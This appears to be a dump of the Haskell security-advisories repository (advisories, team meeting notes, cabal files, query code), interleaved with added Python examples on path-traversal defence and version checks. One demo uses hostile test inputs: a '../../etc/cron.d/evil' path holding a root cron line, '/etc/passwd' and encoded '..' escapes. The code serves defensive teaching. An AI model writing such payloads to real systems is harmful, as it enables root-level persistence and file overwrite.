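    name = unquote(urlparse(image_src).path)            # drop scheme/query, decode %2e%2e
    candidate = os.path.realpath(os.path.join(root, name))   # join discards root if name is absolute
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:                                   # different drives on Windows
        inside = False
    if not inside or candidate == root:
        return None
    return candidate


def extract_media(media_dir: str, images: dict) -> dict:
    """Write each accepted image under media_dir; return {src: "written" | "rejected"}."""
    outcome = {}
    for src, data in images.items():
        target = media_target(media_dir, src)
        if target is None:
            outcome[src] = "rejected"
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(data)
        outcome[src] = "written"
    return outcome


def demo() -> dict:
    """Constructed document images: one legitimate, three that try to escape."""
    media_dir = tempfile.mkdtemp(prefix="media-")
    return extract_media(media_dir, {
        "images/logo.png": b"\x89PNG constructed",
        "../../etc/cron.d/evil": b"* * * * * root sh /tmp/x\n",
        "/etc/passwd": b"pwned",
        "images/%2e%2e/%2e%2e/escape.txt": b"pwned",
    })


if __name__ == "__main__":
    print(demo())
```

The order matters: decode first, then join, then resolve, then compare with `commonpath`; comparing with a plain string prefix would accept `/srv/media-evil` as being inside `/srv/media`, and checking before `realpath` would miss a symlink an earlier document planted under the media directory.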
28 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0006.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0006" 4 | keywords = ["crypto"] 5 | cwe = [403] 6 | 7 | [[references]] 8 | type = "FIX" 9 | url = "https://github.com/kazu-yamamoto/crypton-certificate/commit/e353d450c381c9d6b903c4257927e0c89c97acb1" 10 | 11 | [[affected]] 12 | package = "x509-store" 13 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" 14 | [[affected.versions]] 15 | introduced = "0.1" 16 | 17 | [[affected]] 18 | package = "crypton-x509-store" 19 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" 20 | [[affected.versions]] 21 | introduced = "1.6.9" 22 | fixed = "1.6.12" 23 | ``` 24 | 25 | # Private key leak via inherited file descriptor 26 | 27 | The X.509 key reading function `readKeyFile` opened a file 28 | descriptor to the private key without setting the *close-on-exec* 29 | flag. If a child process is `exec`ed at the same time, it would 30 | inherit that file descriptor and could read the private key 31 | material. 32 | 33 | Impact is limited to child processes that run untrusted code, but 34 | that do not close inherited file descriptors. (For example, the 35 | `su(1)` command.) 36 | 37 | This leak was fixed by setting the *close-on-exec* flag on 38 | unix-based systems. 39 | -------------------------------------------------------------------------------- /meeting-notes/2024-01-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-01-10 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-12-13.md 4 | 5 | 6 | ## 2023 H2 report 7 | 8 | - Draft sent to list; thanks for reviews. FT will publish today. 9 | 10 | ## ZuriHac plans 11 | 12 | - We agree it's a good idea to have a project, e.g. `cabal audit`, Hackage server. 
13 | - Timeline: Jan for concept, March for concrete budget. 14 | - Jose has contact points with cabal-install and HLS. hackage-server seems somewhat unloved. 15 | - Maybe we prioritise getting hackage-server attention? 16 | - Many security improvements should/could be made (e.g. 2FA) 17 | - Can continue the discussion on list or GH issue (public). 18 | 19 | ## Outstanding PRs 20 | 21 | - CWE library support. 22 | 23 | ## Downstream tooling 24 | 25 | - Tristan already started something regarding tracking function calls 26 | https://github.com/TristanCacqueray/cabal-audit 27 | - Support to suppress false positives will be important, esp. because we have >0 advisories for *base*. This could be VEX and/or some other mechanism. 28 | 29 | ## Publishing the HTML advisory index 30 | 31 | - Mihai: I was planning to look into the GHA but didn't get a chance yet 32 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0009.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0009" 4 | keywords = ["biscuit"] 5 | aliases = ["CVE-2024-41949", "GHSA-rgqv-mwc3-c78m", "GHSA-47cq-pc2v-3rmp"] 6 | 7 | [[references]] 8 | type = "ADVISORY" 9 | url = "https://github.com/biscuit-auth/biscuit-haskell/security/advisories/GHSA-47cq-pc2v-3rmp" 10 | [[references]] 11 | type = "FIX" 12 | url = "https://github.com/biscuit-auth/biscuit-haskell/pull/93" 13 | 14 | [[affected]] 15 | package = "biscuit-haskell" 16 | cvss = "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N" 17 | 18 | [[affected.versions]] 19 | introduced = "0.3.0.0" 20 | fixed = "0.4.0.0" 21 | ``` 22 | 23 | # Public key confusion in third-party blocks 24 | 25 | Third-party blocks can be generated without transferring the whole token to the third-party authority. 
Instead, a `ThirdPartyBlock` request can be sent, providing only the necessary info to generate a third-party block and to sign it: 26 | 27 | - the public key of the previous block (used in the signature); 28 | - the public keys part of the token symbol table (for public key interning in datalog expressions). 29 | 30 | A third-party block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair. 31 | -------------------------------------------------------------------------------- /meeting-notes/2025-02-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-02-20 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-02-05.md 5 | 6 | Attended: Gautier, Lei, Tristan, Fraser 7 | 8 | ## Tooling - GHC 9.10 and GHC 9.12 support 9 | 10 | - 9.10 support still depends on update to the 11 | [`feed`](https://hackage.haskell.org/package/feed) package. 12 | Probably just a *base* bounds nudge is needed, e.g. via metadata 13 | revision. 14 | - 9.12 needs CI updates. And also `feed`. And what else? We don't 15 | know yet :) 16 | - haskell-ci refresh probably needed 17 | - Gautier will take a look at it. 18 | 19 | ## ZuriHac / Ecosystem Workshop 20 | 21 | - Ecosystem Workshop Friday 6 June 22 | - https://haskell.foundation/events/2025-haskell-implementors-workshop.html 23 | - ZuriHac Saturday 7 .. Monday 9 June 24 | - https://zfoh.ch/zurihac2025/ 25 | - Gautier will attend ZuriHac, not the workshop 26 | - Tristan is not able to commit 27 | - Fraser is not sure yet (it's 50/50). 28 | 29 | ## List spam 30 | 31 | - It's a shame... 32 | - Can we allow-list the SRT members and other stakeholders? 33 | 34 | ## Meeting calendar 35 | 36 | - FT will check with Jose if he can update the events. 
37 | - Otherwise, artisanal hand-crafted iCalendar events :) 38 | -------------------------------------------------------------------------------- /meeting-notes/2023-10-18.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-10-18 2 | 3 | [Previous meeting notes](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-10-04.md) 4 | 5 | ## Present 6 | 7 | - Tristan, Gautier and Fraser 8 | 9 | ## Previous AIs 10 | 11 | - PRs have been merged 12 | 13 | ## Remaining work to be merged 14 | 15 | - CWE and CVSS validation and data type 16 | - Work on GitHub workflow automation enhancement can proceed when this has been merged. 17 | - FT: As far as I know, we have to pursue a webhook or "bot" approach 18 | rather than executing behaviour within webhooks, because PRs from 19 | forks do not have privileged tokens. 20 | - Tristan: what about issues? Do actions triggered by issues have the needed permissions? 21 | - OpenStack CI has a concept of config job which can run with privileges on untrusted projects. 22 | 23 | ## Downstream tooling 24 | 25 | - David's post calling for action: 26 | https://discourse.haskell.org/t/would-you-like-to-write-a-security-advisory-analyzer/7638 27 | - Gautier: community contribution that was merged as part of the `check` command: https://github.com/blackheaven/security-advisories/pull/2 28 | 29 | ## Outstanding embargoed issue 30 | 31 | - Follow up with Mihai if he knows the status. We might 32 | set a date for disclosure and advise downstream and upstream 33 | -------------------------------------------------------------------------------- /code/cvss/cvss.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: cvss 3 | version: 0.2.0.1 4 | synopsis: Common Vulnerability Scoring System. 5 | description: 6 | Use this library to parse a CVSS string and compute its score. 
7 | 8 | license: BSD-3-Clause 9 | author: Tristan de Cacqueray 10 | maintainer: tdecacqu@redhat.com 11 | category: Data 12 | extra-doc-files: CHANGELOG.md, README.md 13 | tested-with: 14 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 15 | 16 | library 17 | exposed-modules: Security.CVSS 18 | build-depends: 19 | , base >=4.14 && <5 20 | , text >=1.2 && <3 21 | 22 | hs-source-dirs: src 23 | default-language: Haskell2010 24 | ghc-options: 25 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 26 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 27 | 28 | test-suite spec 29 | type: exitcode-stdio-1.0 30 | hs-source-dirs: test 31 | main-is: Spec.hs 32 | build-depends: 33 | , base <5 34 | , cvss 35 | , tasty <2 36 | , tasty-hunit <1.0 37 | , text 38 | 39 | default-language: Haskell2010 40 | ghc-options: 41 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 42 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 43 | -------------------------------------------------------------------------------- /meeting-notes/2023-08-23.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-08-23 2 | 3 | [Previous meeting](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-08-09.md) 4 | 5 | Present: 6 | * Gautier 7 | * Mihai 8 | * Casey 9 | * Tristan 10 | * david 11 | 12 | # Previous action items 13 | 14 | 15 | * Bitwarden accounts? 
  * Mihai and Casey have access and are confirmed

* Mihai:

  * Progress on embargoed items
    * The repo now contains the distribution list for who to send embargoed items to
  * Look into GHCup #858 -- still in progress
    * Mostly done, need to decide whether to send private email or reply on issue

* Tristan: rebase the toml-parser PR#88
  * Done, this is now ready to review

* David: Encourage Pandoc devs to test out our advisory process
  * Done: HSEC-2023-0014

* FT: Documentation of repo structure

* FT: Diagnostic output (created file XYZ)

* FT to publish PR for (currently WIP) enhancement to record package components in HSEC security-advisories

# HSEC-2023-0014

* First advisory contribution: https://github.com/haskell/security-advisories/pull/115

# CWE Library

* Tristan proposed a new library to resolve CWE ids and make advisories more readable: https://github.com/haskell/security-advisories/pull/116
--------------------------------------------------------------------------------
/meeting-notes/2025-03-20.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-03-20

Present: Gautier, Fraser

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-02-20.md

## Thank-yous

- Thanks Tristan for handling HSEC-2025-0001.
- Thanks Gautier for completing support for GHC 9.10,
  by switching from *feed* to *atom-conduit*.
  - 9.12 PR is ready for review.

## ZuriHac + Ecosystem Workshop

- Gautier confirmed his attendance for the full event.
- FT still a maybe.

## HSEC-2024-000{6,7,8}

- 2025-0001 reminded me of the outstanding PR for the GHC numeric bugs:
  [#214](https://github.com/haskell/security-advisories/pull/214).
- IIRC, the delay was to get the tool support for GHC
  (cf Hackage) ecosystem in place. This is all sorted now;
  e.g. see https://osv.dev/vulnerability/HSEC-2025-0001.
- Let's merge it?

## Conf presentation - Security response for open source ecosystems

- FT will present at CrikeyCon this weekend.
  - https://crikeycon.com/schedule/
- I will circulate the slide deck for review tomorrow - feedback welcome.

## Mailing list delivery issues?

- FT: Did anyone else get a big burst of delayed mail yesterday/this
  morning?
  - Confirmed - but I guess it's fixed now :)
--------------------------------------------------------------------------------
/advisories/published/2024/HSEC-2024-0006.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-2024-0006"
cwe = [192]
keywords = ["integrity", "dos", "historical"]

[[affected]]
package = "base"
cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"

[[affected.versions]]
introduced = "4.15.0.0"
fixed = "4.15.1.0"

[[references]]
type = "REPORT"
url = "https://gitlab.haskell.org/ghc/ghc/-/issues/19345"

[[references]]
type = "REPORT"
url = "https://gitlab.haskell.org/ghc/ghc/-/issues/20066"

[[references]]
type = "FIX"
url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/4980"

[[references]]
type = "FIX"
url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/6109"
```

# `fromIntegral`: conversion error

`fromIntegral` may result in coercion errors when used with the optimization flags `-O1` or `-O2`
in the following situations:

- Converting a negative `Int` to `Natural` does not throw an arithmetic underflow error
- Converting a large `Integer` (greater than 2^64) to `Natural` overflows.
39 | 40 | For the most part, these errors in and of themselves result only in availability and data integrity issues. 41 | However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions. 42 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0003.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0003" 4 | cwe = [416] 5 | keywords = ["corruption", "vendored-code", "language-c"] 6 | aliases = ["CVE-2025-31115"] 7 | 8 | [[references]] 9 | type = "ARTICLE" 10 | url = "https://tukaani.org/xz/threaded-decoder-early-free.html" 11 | 12 | [[references]] 13 | type = "FIX" 14 | url = "https://github.com/tukaani-project/xz/commit/d5a2ffe41bb77b918a8c96084885d4dbe4bf6480" 15 | 16 | [[references]] 17 | type = "FIX" 18 | url = "https://github.com/hasufell/lzma-static/commit/e95fe96530568addfc83b771900025053e2c6951" 19 | 20 | [[affected]] 21 | package = "xz-clib" 22 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" 23 | 24 | [[affected.versions]] 25 | introduced = "5.6.3" 26 | fixed = "5.8.1" 27 | ``` 28 | 29 | # Use after free in multithreaded lzma (.xz) decoder 30 | 31 | In XZ Utils 5.3.3alpha to 5.8.0, the multithreaded .xz decoder in 32 | liblzma has a bug where invalid input can at least result in a crash 33 | (CVE-2025-31115). The effects include heap use after free and 34 | writing to an address based on the null pointer plus an offset. 35 | Applications and libraries that use the `lzma_stream_decoder_mt` 36 | function are affected. 37 | 38 | The Haskell *xz-clib* library vendors and builds the C 39 | implementation. The *xz* package does not use the multithreaded 40 | decoder and is therefore unaffected. 
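The `[[affected]]` and `[[affected.versions]]` tables in the advisories above are the data that the `listVersionAffectedBy` and `listVersionRangeAffectedBy` queries in `Security.Advisories.Queries` (elsewhere on this page) evaluate. The following is an added example, not repository code, that answers both questions in Python over version data transcribed from the advisories on this page. It assumes the OSV convention that a range covers `introduced` up to but excluding `fixed` (a missing `fixed` means still affected) and that Cabal-style versions compare component-wise as integer tuples; package components (modules, executables) are not modelled.

```python
"""Affected-version queries over HSEC-style advisory metadata.

Added example, not the repository's own code. The advisory data below is
transcribed from the advisories on this page; everything else is assumed:
half-open [introduced, fixed) ranges in the OSV convention and Cabal-style
dotted-integer versions compared component-wise.
"""
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]

# Constructed from the [[affected]] / [[affected.versions]] tables of the
# advisories on this page. A "fixed" of None would mean "no fix yet".
ADVISORIES: List[Dict] = [
    {"id": "HSEC-2025-0003", "affected": [
        {"package": "xz-clib", "versions": [("5.6.3", "5.8.1")]}]},
    {"id": "HSEC-2024-0006", "affected": [
        {"package": "base", "versions": [("4.15.0.0", "4.15.1.0")]}]},
    {"id": "HSEC-2024-0002", "affected": [
        {"package": "bzlib", "versions": [("0.4", "0.5.2.0")]},
        {"package": "bz2", "versions": [("0.1.0.0", "1.0.1.1")]},
        {"package": "bzlib-conduit", "versions": [("0.1.0.0", "0.3.0.3")]}]},
    {"id": "HSEC-2023-0009", "affected": [
        {"package": "git-annex", "versions": [("0", "6.20170818")]}]},
]


def parse_version(text: str) -> Version:
    """Parse a Cabal-style version ("4.15.0.0") into a comparable int tuple.

    Anything that is not dotted non-negative integers is rejected, so a
    malformed version in a query or an advisory fails loudly instead of
    silently comparing as "not affected".
    """
    parts = text.split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted-integer version: {text!r}")
    return tuple(int(p) for p in parts)


def version_in_range(v: Version, introduced: str, fixed: Optional[str]) -> bool:
    """True when introduced <= v < fixed (fixed=None means no upper bound)."""
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def range_intersects(lo: Version, hi: Optional[Version],
                     introduced: str, fixed: Optional[str]) -> bool:
    """True when the query range [lo, hi) overlaps [introduced, fixed).

    This is the listVersionRangeAffectedBy question: could *any* version a
    dependency solver might pick from the query range be affected?
    """
    intro = parse_version(introduced)
    fix = None if fixed is None else parse_version(fixed)
    below_fix = fix is None or lo < fix
    above_intro = hi is None or intro < hi
    return below_fix and above_intro


def affected_by_version(advisories: List[Dict], package: str, version: str) -> List[str]:
    """IDs of advisories whose affected ranges for `package` contain `version`."""
    v = parse_version(version)
    hits = []
    for adv in advisories:
        for aff in adv["affected"]:
            if aff["package"] != package:
                continue
            if any(version_in_range(v, intro, fix) for intro, fix in aff["versions"]):
                hits.append(adv["id"])
                break
    return hits


def affected_by_range(advisories: List[Dict], package: str,
                      lo: str, hi: Optional[str]) -> List[str]:
    """IDs of advisories touching any version in [lo, hi) of `package`."""
    lo_v = parse_version(lo)
    hi_v = None if hi is None else parse_version(hi)
    hits = []
    for adv in advisories:
        for aff in adv["affected"]:
            if aff["package"] != package:
                continue
            if any(range_intersects(lo_v, hi_v, intro, fix) for intro, fix in aff["versions"]):
                hits.append(adv["id"])
                break
    return hits


if __name__ == "__main__":
    print(affected_by_version(ADVISORIES, "xz-clib", "5.8.0"))  # ['HSEC-2025-0003']
    print(affected_by_version(ADVISORIES, "xz-clib", "5.8.1"))  # []
    print(affected_by_range(ADVISORIES, "bz2", "0.9", "1.1"))   # ['HSEC-2024-0002']
```

The range query is the one a build-plan checker needs: a `build-depends` bound such as `xz-clib >= 5.0 && < 5.7` admits affected versions even though its lower bound is clean, while `< 5.6.3` does not.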
--------------------------------------------------------------------------------
/meeting-notes/2024-06-12.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-06-12

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-29.md

## haskell.org security page

There is now https://www.haskell.org/security/

We still need to configure subdomains so that the advisories index (which was redesigned to comply with the Haskell Foundation design) is updated automatically.

## CVSS Version 4

Initial PR to support CVSS Version 4 [#208](https://github.com/haskell/security-advisories/pull/208)

## Fixed git timestamp parsing logic

Switched to UTCTime everywhere to avoid unexpected issues [#201](https://github.com/haskell/security-advisories/pull/201).

## Snapshots to distribute advisories

Gautier worked on [#179](https://github.com/haskell/security-advisories/pull/179) to introduce a new export mode to hsec-sync to help downstream users (without a git dependency).

## Ecosystem Workshop

Fraser introduced the SRT at the ZuriHac workshop.

The main issue to tackle is the SBOM (e.g. with SPDX).

## 2024 April-June report

Fraser mostly completed it; we might want to add the slides he used during the ZuriHac Ecosystem Workshop to the repository.

## Advisory database

Additionally, 2 HSEC IDs have been reserved for an embargoed vulnerability that we anticipate will be published in Q3.
37 | -------------------------------------------------------------------------------- /meeting-notes/2024-10-02.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-10-02 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-09-04.md 4 | 5 | ## Quarterly report 6 | 7 | Fraser will draft this weekend, and send to list for review. 8 | 9 | ## New SRT members 10 | 11 | Application period closed. There were 4 applications. 12 | Fraser will compile them and share in the coming days. 13 | 14 | ## Hacktoberfest (GitHub) 15 | 16 | - Hécate asks us to put forward some issues. 17 | - `good-first-issue` (or similar) label? 18 | - Let's review the open issues and discuss on-list, then share with Hécate. 19 | 20 | ## Hackage packages release 21 | 22 | - Downstream (`cabal-audit`, `flora`) ask for it (the new `hsec-sync` does not rely on `git`) 23 | - Too much work left to be done on `CVSS 4.0`, it'll be shipped in the next release 24 | 25 | ## Trusted publishing and fuzzing 26 | 27 | - Mihai still to do this prep/proposal. 28 | 29 | ## Prospectus 30 | 31 | - Prospectus of ideas for SRT (or other people working on Haskell security) 32 | will be valuable for HF in asking for funding. 33 | - So, we need to put it together :) 34 | 35 | ## GHC 9.10 support in tools/libs 36 | 37 | - Still waiting on `feed` which does not support base-4.20. 38 | - Probably need to nudge Hackage trustees for a metadata revision. 39 | 40 | ## Outstanding PR review 41 | 42 | - We went through the outstanding PRs in our repo; discussed 43 | what to do with them. 
44 | -------------------------------------------------------------------------------- /code/LICENSE.txt: -------------------------------------------------------------------------------- 1 | The code in this directory is copyright 2023, The Haskell Foundation 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
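HSEC-2025-0004 (the spacecookie advisory below) reports that `sanitizePath` was meant to drop `..` components but, because of a faulty comparison, dropped none of them, and that the fix compares with `equalFilePath`. The following is an added example, not spacecookie's code, that shows the shape of the fixed behaviour in Python together with the two checks a practitioner would want around such a function: a regression test that the sanitiser really eliminates `..`, and a separate root-confinement check of the kind the advisory credits the server executable with. The splitting mirrors Haskell's `System.FilePath.splitPath`, which keeps each component's trailing separators (so `..` arrives as `../`); the hypothetical `naive_sanitize` is only there to show what the regression check catches and is not the original bug.

```python
"""Path sanitisation with a regression check that it really removes "..".

Added example; not spacecookie's code. Components are split the way
System.FilePath.splitPath does (each keeps its trailing separators, so ".."
arrives as "../"), normalised, and only then compared, which is the effect
of the equalFilePath comparison the advisory names as the fix. A second,
independent root-confinement check plays the role the advisory attributes
to the spacecookie server binary.
"""
import posixpath
from typing import Callable, List, Optional, Tuple

# Constructed sample selectors, as a gopher server might receive them.
SAMPLES = ["/docs/../../etc/passwd", "./a/./b//c/", "..", "../", "", "a/b",
           "x/../..", "..//hidden"]


def split_path_keep_sep(path: str) -> List[str]:
    """Split like Haskell's splitPath: "a//b/c" -> ["a//", "b/", "c"]."""
    comps: List[str] = []
    cur = ""
    for ch in path:
        if ch != "/" and cur.endswith("/"):
            comps.append(cur)
            cur = ""
        cur += ch
    if cur:
        comps.append(cur)
    return comps


def naive_sanitize(selector: str) -> str:
    """Hypothetical sanitiser that compares the raw component to "..".

    With splitPath-style components "../" never equals "..", so the
    traversal survives. It exists only as the kind of mistake that
    check_sanitizer() is meant to catch; it is not the original bug.
    """
    return "".join(c for c in split_path_keep_sep(selector) if c != "..")


def sanitize_path(selector: str) -> str:
    """Drop "", "." and ".." components after normalising each one.

    Stripping the separators that splitPath leaves behind is the
    equalFilePath step: "../", "..//" and ".." all compare equal to "..".
    """
    kept = []
    for comp in split_path_keep_sep(selector):
        bare = comp.strip("/")
        if bare in ("", ".", ".."):
            continue
        kept.append(bare)
    return "/".join(kept)


def check_sanitizer(fn: Callable[[str], str],
                    samples: List[str]) -> List[Tuple[str, str]]:
    """(input, output) pairs where fn's output still contains a ".."
    component or is absolute, i.e. could still escape a document root."""
    bad = []
    for s in samples:
        out = fn(s)
        comps = [c.strip("/") for c in split_path_keep_sep(out)]
        if out.startswith("/") or ".." in comps:
            bad.append((s, out))
    return bad


def resolve_under_root(root: str, selector: str) -> Optional[str]:
    """Sanitise, join onto root, and refuse anything that leaves root."""
    if "\0" in selector:
        return None
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, sanitize_path(selector)))
    prefix = root if root.endswith("/") else root + "/"
    if target != root and not target.startswith(prefix):
        return None
    return target


if __name__ == "__main__":
    print(check_sanitizer(sanitize_path, SAMPLES))   # []
    print(check_sanitizer(naive_sanitize, SAMPLES))  # several offending pairs
```

The `check_sanitizer` harness is the cheap insurance here: run it over a corpus of traversal-shaped inputs in the test suite, and a broken comparison fails CI instead of shipping in several releases.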
12 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Queries.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Queries 2 | ( listVersionAffectedBy 3 | , listVersionRangeAffectedBy 4 | ) 5 | where 6 | 7 | import Control.Monad.IO.Class (MonadIO) 8 | import Distribution.Types.Version (Version) 9 | import Distribution.Types.VersionRange (VersionRange) 10 | import Validation (Validation(..)) 11 | 12 | import Security.Advisories.Core.Advisory 13 | import Security.Advisories.Filesystem 14 | import Security.Advisories.Parse 15 | 16 | type QueryResult = Validation [(FilePath, ParseAdvisoryError)] [Advisory] 17 | 18 | -- | List the advisories matching a component and a version 19 | listVersionAffectedBy 20 | :: MonadIO m 21 | => FilePath -> ComponentIdentifier -> Version -> m QueryResult 22 | listVersionAffectedBy = listAffectedByHelper isVersionAffectedBy 23 | 24 | -- | List the advisories matching a component and a version range 25 | listVersionRangeAffectedBy 26 | :: (MonadIO m) 27 | => FilePath -> ComponentIdentifier -> VersionRange -> m QueryResult 28 | listVersionRangeAffectedBy = listAffectedByHelper isVersionRangeAffectedBy 29 | 30 | -- | Helper function for 'listVersionAffectedBy' and 'listVersionRangeAffectedBy' 31 | listAffectedByHelper 32 | :: (MonadIO m) 33 | => (ComponentIdentifier -> a -> Advisory -> Bool) -> FilePath -> ComponentIdentifier -> a -> m QueryResult 34 | listAffectedByHelper checkAffectedBy root queryComponent queryVersionish = 35 | fmap (filter (checkAffectedBy queryComponent queryVersionish)) <$> 36 | listAdvisories root 37 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0004.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-2025-0004" 5 | cwe = [23] 6 | 
capec = [126] 7 | keywords = ["gopher", "path-traversal"] 8 | 9 | aliases = [] 10 | related = [] 11 | 12 | [[affected]] 13 | package = "spacecookie" 14 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" 15 | 16 | declarations = { "Network.Gopher.Util.santinizePath" = ">= 0.2.0.0 && < 1.0", "Network.Gopher.Util.santinizeIfNotUrl" = ">= 0.2.0.0 && < 1.0", "Network.Gopher.Util.sanitizePath" = ">= 1.0.0.0 && < 1.0.0.3", "Network.Gopher.Util.sanitizeIfNotUrl" = ">= 1.0.0.0 && < 1.0.0.3" } 17 | 18 | [[affected.versions]] 19 | introduced = "0.2.0.0" 20 | fixed = "1.0.0.3" 21 | 22 | [[references]] 23 | type = "FIX" 24 | url = "https://github.com/sternenseemann/spacecookie/commit/2854a8a70833e7abdeeff3c02596a6f2a2f35c61" 25 | ``` 26 | 27 | # Broken Path Sanitization in spacecookie Library 28 | 29 | The spacecookie library exposes the functions `sanitizePath` and `sanitizeIfNotUrl` intended to 30 | remove `..` components from paths which can be used to prevent path traversal attacks. Due to 31 | erroneous comparison code, this elimination is not actually performed which has been remedied 32 | in version 1.0.0.3 by properly comparing using `equalFilePath`. 33 | 34 | Any user of those respective functions of any version of spacecookie should upgrade to 1.0.0.3 35 | or later. Note that the spacecookie server executable included in the same package is not affected 36 | by the problem since a separate check would reject any malicious path that gets by `sanitizePath`. 37 | -------------------------------------------------------------------------------- /code/purl/purl.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 3.0 2 | name: purl 3 | version: 0.1.0.0 4 | synopsis: Support for purl (mostly universal package url). 
5 | description: 6 | Support for the purl specification: 7 | 8 | license: BSD-3-Clause 9 | author: Gautier DI FOLCO 10 | maintainer: foss@difolco.dev 11 | category: Data 12 | extra-doc-files: CHANGELOG.md, README.md 13 | tested-with: 14 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 15 | 16 | library 17 | exposed-modules: Data.Purl 18 | build-depends: 19 | , base >=4.14 && <5 20 | , aeson >=2.0 && <2.3 21 | , case-insensitive <1.3 22 | , containers >=0.6 && <0.8 23 | , http-types >=0.10.0 && <0.13 24 | , parsec ==3.1.* 25 | , text >=1.2 && <3 26 | 27 | hs-source-dirs: src 28 | default-language: Haskell2010 29 | ghc-options: 30 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 31 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 32 | 33 | test-suite spec 34 | type: exitcode-stdio-1.0 35 | hs-source-dirs: test 36 | main-is: Spec.hs 37 | build-depends: 38 | , base <5 39 | , containers 40 | , purl 41 | , tasty <2 42 | , tasty-hunit <1.0 43 | , text 44 | 45 | default-language: Haskell2010 46 | ghc-options: 47 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 48 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 49 | -------------------------------------------------------------------------------- /code/cvss/test/Spec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Control.Monad 6 | import Data.Text (Text) 7 | import qualified Security.CVSS as CVSS 8 | import Test.Tasty 9 | import Test.Tasty.HUnit 10 | 11 | main :: IO () 12 | main = defaultMain $ 13 | testCase "Security.CVSS" $ do 